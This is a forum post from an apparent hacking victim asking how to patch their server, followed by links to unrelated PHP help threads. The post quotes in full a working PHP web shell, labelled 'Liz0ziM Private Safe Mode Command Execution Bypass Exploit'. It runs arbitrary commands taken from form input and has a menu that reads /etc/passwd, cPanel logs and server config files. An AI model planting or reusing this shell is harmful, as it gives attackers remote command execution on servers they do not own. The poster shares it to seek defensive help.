I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
Help with lottery style system?
I'm working on a currency system for forums and it is going to have a type of lottery system built into it. Trying to figure out the best way to make the drawings work. I'm still new to cron jobs but
Structure Question - One Table or One Table Per Record Set?
I have a web app (mySQL and PHP) which allows people to create an item with up to 200 records which I store in a single table. Any user subscribing to that item will be pulling up to 4 records from
Last character removed
I have created a string from an array. I have inserted commas from my form values. I am trying to remove the last comma from the string and can't seem to remove it. I have tried chop, rtrim, substr,
Calling strings from other php class
I have test1.php{$string1;$string2;....... //10 strings in this class $string10;}Another class test2.php{.........I want to use those 10 strings here, how should I do it?}
UDS 4.0 Datatype issue
UDS 4.0.322 -- connecting to NI Labview 9.0
couldn't connect to your database
Hello I am new to php mysqlActually i have read A tutorial on nettuts"http://net.tutsplus.com/tutorials/php/create-a-signup-form-with-email-confirmation/"According i copy all source code
How would I do "Users not logged in since *** delete them"
I know how I would set this up, and delete the user roughly.I'll create a table called "Users Status" with ID, Username, date registered, and last logged in collumns. Last Logged in will be
Do While statement
hi guys,This may sound trivial but im new to php and as part of an assignmenti have to construct the 10 green bottles song using the do while statement. I can do the statement but it is itengrating
delete comma
HI,How to delete "," at the end of the string.Code: $match = 2009/02/03/a2correx03cvbnm,echo preg_replace("/;$/", "HI", "$match");
How to limit the calls to an API
Hello, in my simple script I call an api which effectively involves me getting an xml file.However the problem is everytime I get a visitor to the webpage it calls the API which means lots of wasteful
